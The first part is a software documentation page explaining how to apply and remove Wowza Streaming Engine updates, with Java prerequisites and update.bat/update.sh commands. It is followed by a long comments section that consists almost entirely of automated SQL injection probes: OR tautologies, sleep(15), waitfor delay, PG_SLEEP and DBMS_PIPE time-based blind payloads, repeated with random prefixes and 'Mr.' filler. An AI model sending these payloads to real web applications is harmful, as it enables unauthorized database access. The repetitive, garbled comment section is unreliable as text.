About Wowza Streaming Engine updates
Updates for Wowza Streaming Engine are packaged in a ZIP archive updater file using the naming convention WowzaStreamingEngine-Update-[version ].zip where [version] is the update version.
You must have an active Maintenance and Support contract to receive updaters. The Maintenance and Support contract entitles you to free full upgrades and dot-release updates for Wowza Streaming Engine, and email technical support. If you have a valid license for Wowza Streaming Engine, you can create an account on Wowza.com and then sign in to your Account Management page to find available updaters on the Downloads tab.
Before you start
Depending on the version of your base installation of Wowza Streaming Engine and the version you want to update to, you may need to install a supported version of Java before you update.
Updating to Wowza Streaming Engine version 4.8.18 or later
You should complete the following tasks if you are updating to Wowza Streaming Engine 4.8.18 from a base installation of Wowza Streaming Engine 4.8.17 or earlier:
- Install a supported version of Java, such as Java 11-12 or the OpenJDK Java SE JRE 11.0.2 installed with Wowza Streaming Engine 4.8.18 (available from the Downloads tab of My Account). Then instruct Wowza Streaming Engine to use that version of Java according to the instructions in Manually install and troubleshoot Java on Wowza Streaming Engine.
Note: Any custom user modules, designed for previous Java versions, may need to be modified to work in Java version 11.
Updating to Wowza Streaming Engine version 4.7.8 – 4.8.17
You should complete the following tasks if you are updating to Wowza Streaming Engine 4.7.8 – 4.8.17 from a base installation of Wowza Streaming Engine 4.7.7 or earlier:
- Install a supported version of Java, such as Java 9-12 or the OpenJDK Java SE JRE 9.0.4 installed with Wowza Streaming Engine 4.7.8 – 4.8.17 (available from the Downloads tab of My Account). Then instruct Wowza Streaming Engine to use that version of Java according to the instructions in Manually install and troubleshoot Java on Wowza Streaming Engine.
With Wowza Streaming Engine 4.8.5, we repackaged the version of OpenJDK Java SE JRE 9.0.4 installed with Wowza Streaming Engine. This custom packaged version of OpenJDK Java SE JRE 9.0.4 is not installed with earlier versions of Wowza Streaming Engine but is recommended for Wowza Streaming Engine 4.8.5 – 4.8.17. Also, the java.scripting module, which is included in the custom packaged version of OpenJDK Java SE JRE 9.0.4, is required for Wowza Streaming Engine 4.8.8 – 4.8.17 but is not added by the Wowza Streaming Engine 4.8.8 updater. If you are updating to Wowza Streaming Engine 4.8.5 – 4.8.17 from Wowza Streaming Engine 4.8.0 or earlier, before you update, install the custom version of OpenJDK Java SE JRE 9.0.4 available from the the Downloads tab of My Account and then instruct Wowza Streaming Engine to use that version of Java according to the instructions in Manually install and troubleshoot Java on Wowza Streaming Engine.
Note: If you are updating to Wowza Streaming Engine versions 4.7.8 through 4.8.5, the winstone.properties file, and any custom configurations specified in it for Wowza Streaming Engine Manager, will be overwritten with the new Apache Tomcat 9.0 file (tomcat.properties ). To continue using your custom configurations, you must manually add re-add your settings to the tomcat.properties file. For more information, see Stopped using the Winstone servlet container in Wowza Streaming Engine Manager.
Applying an update
Notes:
- Administrator/root privileges are required to apply an update.
- You must stop Wowza Streaming Engine and Wowza Streaming Engine Manager before applying an update. See Start and stop Wowza Streaming Engine for more information about how to do this.
- Applying an update to Wowza Streaming Engine overwrites the [install-dir]/manager/bin/startmgr.sh (macOS and Linux) or [install-dir]/manager/bin/startmgr.bat (Windows) file. If you've modified this file and wish to keep the modifications, you must update the new file accordingly.
Apply an update on Windows (step-by-step instructions)
- Extract the updater .zip file contents and then copy the included WowzaStreamingEngine-Update-[version] folder to your [install-dir]/updates directory (where [install-dir] is the install directory of Wowza Streaming Engine).
-
Open an elevated command prompt:
- Click Start , and then in the Search programs and files box type Command Prompt.
- In the search results, right click on the Command Line program, and then click Run as administrator.
- Execute the following command to change the active directory to the location
of update.bat:
cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/windows
Note: Instead of typing out the file path, you can copy the directory from the Finder window and right-click in the Command Prompt window to paste the selection.
- Execute the following command to apply the update:
update.bat
- Follow the prompts on the command line. You'll see something similar to the
following:
update.batVerifying running as administrative userLocating Wowza Streaming Engine installation directoryRunning Wowza Streaming Engine update installerPath:This will update your installation at : [install-dir]Currently installed version : Wowza Streaming Engine <version> - Build <#>This will update your installation to : Wowza Streaming Engine <version> - Build <#>Are you sure you want to continue? (y/n)yWowza Streaming Engine <version> Release Notes Version: Wowza Streaming Engine <new version>This document describes the detailed changes in Wowza Streaming Engine <new version>. For more information about the features and known issues in this version of the server, see the README.txt file in the files directory of this update.========================================Changes in <new version> Build <#>...Press enter/return to continueDetected operating system: windowsChecking file versions.Backing up current files.Successfully created backup: [path-to-backup-file]Updating installation.The update process completed successfully.
- Restart the server. See Start and stop Wowza Streaming Engine for more information.
Important: Do not delete the WowzaStreamingEngine-Update-[version].zip file. You'll need it if you want to remove the update later. Only that version of the update tool will remove that version of the update. See Removing an update for more information about remove (rollback) updates.
Apply an update on Linux and macOS (step-by-step instructions)
- Extract the updater .zip file contents. In most cases, extracting the .zip file automatically creates a WowzaStreamingEngine-Update-[version] folder that contains the .zip file contents where [version] is the Wowza Streaming Engine version number. If not, create a folder with that naming convention and copy the extracted .zip file contents into it.
- Copy the WowzaStreamingEngine-Update-[version] folder to your [install-dir]/updates directory (where [install-dir] is the install directory of Wowza Streaming Engine).
-
Open a Terminal window and execute the following command to change the active directory to the location of update.sh:
Linux:cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/linux
macOS:cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/osx
Note: Instead of typing out the file path, you can drag and drop the folder from Finder into the Terminal window to automatically enter the folder location.
-
Change to root or use the sudo command if you have sudo privileges to perform the following commands:
- If you must restore the execute permissions on the initial update scripts,
execute the following command:
sudo chmod +x *.sh
- Execute the following command to apply the update:
sudo ./update.sh
- If you must restore the execute permissions on the initial update scripts,
execute the following command:
-
Follow the prompts on the command line. You'll see something similar to the following:
./update.shVerifying running as administrative userLocating Wowza Streaming Engine installation directoryRunning Wowza Streaming Engine update installerPath: This will update your installation at : [install-dir]Currently installed version : Wowza Streaming Engine <version> - Build <#>This will update your installation to : Wowza Streaming Engine <version> - Build <#>Are you sure you want to continue? (y/n)yWowza Streaming Engine <version> Release Notes Version: Wowza Streaming Engine <new version>This document describes the detailed changes in Wowza Streaming Engine <new version>. For more information about the features and known issues in this version of the Server, see the README.txt file in the files directory of this update.========================================Changes in <new version> Build <#>...Press enter/return to continueDetected operating system: [linux]|[osx]Checking file versions.Backing up current files.Successfully created backup: [path-to-backup-file]Updating installation.The update process completed successfully.
- Restart the server. See Start and stop Wowza Streaming Engine for more information.
Important: Do not delete the WowzaStreamingEngine-Update-[version].zip file. You'll need it if you want to remove the update later. Only that version of the update tool will remove that version of the update. See Removing an update for more information about remove (rollback) updates.
Removing an update
Notes:
- Administrator/root privileges are required to remove an update.
- You must stop Wowza Streaming Engine before removing an update. See Start and stop Wowza Streaming Engine for more information.
- Because Wowza Streaming Engine 4.7.8 – 4.8.17 are built on Java 9 and Wowza Streaming Engine 4.8.18 and later are built on Java 11, if you're removing an update to Wowza Streaming Engine 4.8.18 or later and reverting to Wowza Streaming Engine 4.7.8 – 4.8.17, you need to manually change your Java version back to Java 9. For more information, see Manually install and troubleshoot Java on Wowza Streaming Engine.
Remove an update on Windows (step-by-step instructions)
- Extract the updater .zip file contents and then copy the included WowzaStreamingEngine-Update-[version] folder to your [install-dir]/updates directory, if you don't already have it there from applying the update.
-
Open an elevated command prompt:
- Click Start , and then in the Search programs and files box type Command Prompt.
- In the search results, right click on the Command Line program, and then click Run as administrator.
- Execute the following command to change the active directory to the location
of update.bat:
cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/windows
Note: Instead of typing out the file path, you can copy the directory from the Windows Explorer window and right click in the Command Prompt window to paste the selection.
- Execute the following command to remove the update:
update.bat -u
- Follow the prompts on the command line. You'll see something similar to the
following:
update.bat -uVerifying running as administrative userLocating Wowza Streaming Engine installation directoryRunning Wowza Streaming Engine update installerPath:This will uninstall Wowza Streaming Engine <update version> - Build <#> from your system.This will be removed from your installation at : [install-dir]Detected operating system: windowsFound backupfile. [backup-file-name]Restoring from detected backup: [path-to-backup-file]Restoring to version: Wowza Streaming Engine <old version> - Build <#>Are you sure you want to continue? (y/n)yRestoring from [path-to-backup-file]Restoration complete.
- Restart the server. See Start and stop Wowza Streaming Engine for more information.
Remove an update on Linux and macOS (step-by-step instructions)
- Extract the updater .zip file contents and then copy the included WowzaStreamingEngine-Update-[version] folder to your [install-dir]/updates directory, if you don't already have it there from applying the update.
-
Open a Terminal window and execute the following command to change the active directory to the location of update.sh:
Linux:cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/linux
macOS:cd [install-dir]/updates/WowzaStreamingEngine-Update-[version]/osx
Note: Instead of typing out the file path, you can drag and drop the folder from Finder into the Terminal window to automatically enter the folder location.
-
Change to root or use the sudo command if you have sudo privileges to perform the following commands:
- If you must restore the execute permissions on the initial update scripts,
execute the following command:
sudo chmod +x *.sh
- Execute the following command:
sudo ./update.sh -u
- If you must restore the execute permissions on the initial update scripts,
execute the following command:
-
Follow the prompts on the command line. You'll see something similar to the following:
update.sh -uVerifying running as administrative userLocating Wowza Streaming Engine installation directoryRunning Wowza Streaming Engine update installerThis will uninstall Wowza Streaming Engine <version> - Build <#> from your system.This will be removed from your installation at: [install-dir]Detected operating system: [linux]|[osx]Found backup file: [backup-file-name]Restoring from backup:[install-dir]/updates/backup/[backup-file-name]Restoring to version: Wowza Streaming Engine <old version> - Build <#>Are you sure you want to continue? (y/n)yRestoring from backup: [install-dir]/updates/backup/[backup-file-name]Restoration complete.
- Restart the server. See Start and stop Wowza Streaming Engine for more information.
Comments (774)
Mr.
1
Mr.
1
Mr.
1
Mr.
1
2xNzmU19
1
-1 OR 2+375-375-1=0+0+0+1 --
1
-1 OR 2+977-977-1=0+0+0+1
1
-1' OR 2+734-734-1=0+0+0+1 --
1
-1' OR 2+607-607-1=0+0+0+1 or 'Oy4uyIrp'='
1
-1" OR 2+303-303-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1 waitfor delay '0:0:15' --
1
25P7UNJ9'; waitfor delay '0:0:15' --
1
9zo6PwjC'); waitfor delay '0:0:15' --
1
Cz7qaIgS')); waitfor delay '0:0:15' --
1
kW4Ght5H' OR 132=(SELECT 132 FROM PG_SLEEP(15))--
1
MsKsCMnu') OR 586=(SELECT 586 FROM PG_SLEEP(15))--
1
AJcNKRqZ')) OR 411=(SELECT 411 FROM PG_SLEEP(15))--
1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
1 ����%2527%2522
1
@@0S7u3
1
Mr.
1
Mr.
1
Mr.
UzrkzXXN
Mr.
-1 OR 2+439-439-1=0+0+0+1 --
Mr.
-1 OR 2+417-417-1=0+0+0+1
Mr.
-1' OR 2+291-291-1=0+0+0+1 --
Mr.
-1' OR 2+812-812-1=0+0+0+1 or 'TyFbxpWM'='
Mr.
-1" OR 2+292-292-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
gXV93yVb'; waitfor delay '0:0:15' --
Mr.
mOmKcfDJ'); waitfor delay '0:0:15' --
Mr.
xj5G78LE')); waitfor delay '0:0:15' --
Mr.
-5 OR 855=(SELECT 855 FROM PG_SLEEP(15))--
Mr.
-5) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
Mr.
-1)) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
Mr.
K33lOyHI' OR 957=(SELECT 957 FROM PG_SLEEP(15))--
Mr.
9Oq17fLH') OR 531=(SELECT 531 FROM PG_SLEEP(15))--
Mr.
0fqkJmZa')) OR 17=(SELECT 17 FROM PG_SLEEP(15))--
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@N54N4
Mr.
lcE6l7U9
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
-1 OR 2+165-165-1=0+0+0+1
Mr.
-1 OR 3+165-165-1=0+0+0+1
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
YDfarsPD'; waitfor delay '0:0:15' --
Mr.
jFxjPQbc'); waitfor delay '0:0:15' --
Mr.
aYSkF9Bz')); waitfor delay '0:0:15' --
Mr.
-5 OR 64=(SELECT 64 FROM PG_SLEEP(15))--
Mr.
-5) OR 336=(SELECT 336 FROM PG_SLEEP(15))--
Mr.
-1)) OR 742=(SELECT 742 FROM PG_SLEEP(15))--
Mr.
oN8UqzT5' OR 805=(SELECT 805 FROM PG_SLEEP(15))--
Mr.
reNw0Z5k') OR 391=(SELECT 391 FROM PG_SLEEP(15))--
Mr.
dlN1cmeT')) OR 632=(SELECT 632 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@T8lzQ
Mr.
555
Mr.
555
Mr.
555
uJ406b4x
555
-1 OR 2+145-145-1=0+0+0+1 --
555
-1 OR 2+410-410-1=0+0+0+1
555
-1' OR 2+531-531-1=0+0+0+1 --
555
-1' OR 2+687-687-1=0+0+0+1 or 'NBz0dJQr'='
555
-1" OR 2+922-922-1=0+0+0+1 --
555
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1 waitfor delay '0:0:15' --
555
VUSNh6BN'; waitfor delay '0:0:15' --
555
Bwcgm2k9'); waitfor delay '0:0:15' --
555
l8xdKkTu')); waitfor delay '0:0:15' --
555
4H9iLLc4' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
555
mFlckbv9') OR 956=(SELECT 956 FROM PG_SLEEP(15))--
555
b9lUzBFN')) OR 60=(SELECT 60 FROM PG_SLEEP(15))--
555
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
555
1 ����%2527%2522
555
@@UobtJ
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
-1 OR 2+358-358-1=0+0+0+1 --
Mr.
-1 OR 3+358-358-1=0+0+0+1 --
Mr.
-1 OR 2+967-967-1=0+0+0+1
Mr.
-1 OR 3+967-967-1=0+0+0+1
Mr.
-1' OR 2+814-814-1=0+0+0+1 --
Mr.
-1' OR 3+814-814-1=0+0+0+1 --
Mr.
-1' OR 2+479-479-1=0+0+0+1 or 'ugMBPpwi'='
Mr.
-1' OR 3+479-479-1=0+0+0+1 or 'ugMBPpwi'='
Mr.
-1" OR 2+419-419-1=0+0+0+1 --
Mr.
-1" OR 3+419-419-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
VAMQJbc9'; waitfor delay '0:0:15' --
Mr.
YszPRF14'); waitfor delay '0:0:15' --
Mr.
DH2xF0XX')); waitfor delay '0:0:15' --
Mr.
-5 OR 629=(SELECT 629 FROM PG_SLEEP(15))--
Mr.
-5) OR 84=(SELECT 84 FROM PG_SLEEP(15))--
Mr.
-1)) OR 125=(SELECT 125 FROM PG_SLEEP(15))--
Mr.
bS5e3tkC' OR 909=(SELECT 909 FROM PG_SLEEP(15))--
Mr.
6TZtIr8B') OR 752=(SELECT 752 FROM PG_SLEEP(15))--
Mr.
6aTwEp0z')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@tU9dS
Mr.
-1 OR 2+517-517-1=0+0+0+1 --
Mr.
-1 OR 3+517-517-1=0+0+0+1 --
Mr.
-1 OR 2+279-279-1=0+0+0+1
Mr.
-1 OR 3+279-279-1=0+0+0+1
Mr.
-1' OR 2+249-249-1=0+0+0+1 --
Mr.
-1' OR 3+249-249-1=0+0+0+1 --
Mr.
-1' OR 2+161-161-1=0+0+0+1 or 'uOu5BTmh'='
Mr.
-1' OR 3+161-161-1=0+0+0+1 or 'uOu5BTmh'='
Mr.
-1" OR 2+693-693-1=0+0+0+1 --
Mr.
-1" OR 3+693-693-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
j2d0mWjw'; waitfor delay '0:0:15' --
Mr.
Bj3OXeul'); waitfor delay '0:0:15' --
Mr.
zmZQscY0')); waitfor delay '0:0:15' --
Mr.
-5 OR 765=(SELECT 765 FROM PG_SLEEP(15))--
Mr.
-5) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
Mr.
-1)) OR 309=(SELECT 309 FROM PG_SLEEP(15))--
Mr.
ex8sDXnH' OR 984=(SELECT 984 FROM PG_SLEEP(15))--
Mr.
jqe3Y1XC') OR 827=(SELECT 827 FROM PG_SLEEP(15))--
Mr.
TukE1ItM')) OR 910=(SELECT 910 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@jeztm
Mr.
-1 OR 2+671-671-1=0+0+0+1 --
Mr.
-1 OR 3+671-671-1=0+0+0+1 --
Mr.
-1 OR 2+715-715-1=0+0+0+1
Mr.
-1 OR 3+715-715-1=0+0+0+1
Mr.
-1' OR 2+503-503-1=0+0+0+1 --
Mr.
-1' OR 3+503-503-1=0+0+0+1 --
Mr.
-1' OR 2+250-250-1=0+0+0+1 or 'alcSXpp4'='
Mr.
-1' OR 3+250-250-1=0+0+0+1 or 'alcSXpp4'='
Mr.
-1" OR 2+799-799-1=0+0+0+1 --
Mr.
-1" OR 3+799-799-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
WAeYGaLR'; waitfor delay '0:0:15' --
Mr.
FZvkvILL'); waitfor delay '0:0:15' --
Mr.
TaIht7zQ')); waitfor delay '0:0:15' --
Mr.
-5 OR 694=(SELECT 694 FROM PG_SLEEP(15))--
Mr.
-5) OR 820=(SELECT 820 FROM PG_SLEEP(15))--
Mr.
-1)) OR 707=(SELECT 707 FROM PG_SLEEP(15))--
Mr.
tGhD7515' OR 949=(SELECT 949 FROM PG_SLEEP(15))--
Mr.
d8kHdo8S') OR 932=(SELECT 932 FROM PG_SLEEP(15))--
Mr.
fGOSKuKC')) OR 135=(SELECT 135 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@zCmnb
Mr.
1
Mr.
1
Mr.
1
Mr.
1
08yzUJta
1
-1 OR 2+793-793-1=0+0+0+1 --
1
-1 OR 2+538-538-1=0+0+0+1
1
-1' OR 2+380-380-1=0+0+0+1 --
1
-1' OR 2+353-353-1=0+0+0+1 or 'u2A5yWWo'='
1
-1" OR 2+868-868-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1 waitfor delay '0:0:15' --
1
btRMLh88'; waitfor delay '0:0:15' --
1
LbZf5tt7'); waitfor delay '0:0:15' --
1
0y5PIvvo')); waitfor delay '0:0:15' --
1
Mr.
1
CAukGuqB' OR 292=(SELECT 292 FROM PG_SLEEP(15))--
1
Mr.
1
3JUFovnj') OR 409=(SELECT 409 FROM PG_SLEEP(15))--
1
Mr.
gAWZtmXY
Mr.
-1 OR 2+997-997-1=0+0+0+1 --
Mr.
-1 OR 2+800-800-1=0+0+0+1
Mr.
-1' OR 2+701-701-1=0+0+0+1 --
Mr.
-1' OR 2+52-52-1=0+0+0+1 or 'apCnfFKQ'='
Mr.
-1" OR 2+858-858-1=0+0+0+1 --
FNo4DRSu')) OR 841=(SELECT 841 FROM PG_SLEEP(15))--
1
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
1 ����%2527%2522
1
@@Tt9hT
1
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
u1Ey6PHS'; waitfor delay '0:0:15' --
Mr.
JTZu8Ifq'); waitfor delay '0:0:15' --
Mr.
4BP7i6oj')); waitfor delay '0:0:15' --
Mr.
-5 OR 131=(SELECT 131 FROM PG_SLEEP(15))--
Mr.
-5) OR 615=(SELECT 615 FROM PG_SLEEP(15))--
Mr.
-1)) OR 493=(SELECT 493 FROM PG_SLEEP(15))--
Mr.
TPb2FvbY' OR 613=(SELECT 613 FROM PG_SLEEP(15))--
Mr.
vGLlnzUv') OR 594=(SELECT 594 FROM PG_SLEEP(15))--
Mr.
8MAEZMJ4')) OR 713=(SELECT 713 FROM PG_SLEEP(15))--
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@X2XmI
Mr.
1
Mr.
1
Mr.
1
Mr.
1
0WskZDFd
1
-1 OR 2+71-71-1=0+0+0+1 --
1
-1 OR 2+16-16-1=0+0+0+1
1
-1' OR 2+672-672-1=0+0+0+1 --
1
-1' OR 2+702-702-1=0+0+0+1 or '0lSmJhjT'='
1
-1" OR 2+844-844-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1 waitfor delay '0:0:15' --
1
3fL84Fog'; waitfor delay '0:0:15' --
1
QbYRygTk'); waitfor delay '0:0:15' --
1
rNCgHtKF')); waitfor delay '0:0:15' --
1
BC2dcyhw' OR 667=(SELECT 667 FROM PG_SLEEP(15))--
1
66qvUuZX') OR 346=(SELECT 346 FROM PG_SLEEP(15))--
1
Vc6T9txX')) OR 544=(SELECT 544 FROM PG_SLEEP(15))--
1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
1 ����%2527%2522
1
@@R8LKg
1
Mr.
1
Mr.
1
Mr.
SIw63ftO
Mr.
-1 OR 2+245-245-1=0+0+0+1 --
Mr.
-1 OR 2+855-855-1=0+0+0+1
Mr.
-1' OR 2+412-412-1=0+0+0+1 --
Mr.
-1' OR 2+355-355-1=0+0+0+1 or 'zYolpqEe'='
Mr.
-1" OR 2+195-195-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
MVirnUyW'; waitfor delay '0:0:15' --
Mr.
67ESnMEI'); waitfor delay '0:0:15' --
Mr.
2jZ6UqWI')); waitfor delay '0:0:15' --
Mr.
-5 OR 284=(SELECT 284 FROM PG_SLEEP(15))--
Mr.
-5) OR 888=(SELECT 888 FROM PG_SLEEP(15))--
Mr.
-1)) OR 565=(SELECT 565 FROM PG_SLEEP(15))--
Mr.
NjfNorVm' OR 482=(SELECT 482 FROM PG_SLEEP(15))--
Mr.
WFu7sgid') OR 607=(SELECT 607 FROM PG_SLEEP(15))--
Mr.
siLMaZmW')) OR 340=(SELECT 340 FROM PG_SLEEP(15))--
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@4MRSV
Mr.
-1 OR 2+616-616-1=0+0+0+1 --
Mr.
-1 OR 3+616-616-1=0+0+0+1 --
Mr.
-1 OR 2+898-898-1=0+0+0+1
Mr.
-1 OR 3+898-898-1=0+0+0+1
Mr.
-1' OR 2+554-554-1=0+0+0+1 --
Mr.
-1' OR 3+554-554-1=0+0+0+1 --
Mr.
-1' OR 2+126-126-1=0+0+0+1 or '4JQR77nB'='
Mr.
-1' OR 3+126-126-1=0+0+0+1 or '4JQR77nB'='
Mr.
-1" OR 2+949-949-1=0+0+0+1 --
Mr.
-1" OR 3+949-949-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
555
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
15QY1oTd'; waitfor delay '0:0:15' --
Mr.
B2hEKDGW'); waitfor delay '0:0:15' --
Mr.
WkOCMBY4')); waitfor delay '0:0:15' --
Mr.
-5 OR 307=(SELECT 307 FROM PG_SLEEP(15))--
Mr.
-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
Mr.
-1)) OR 332=(SELECT 332 FROM PG_SLEEP(15))--
Mr.
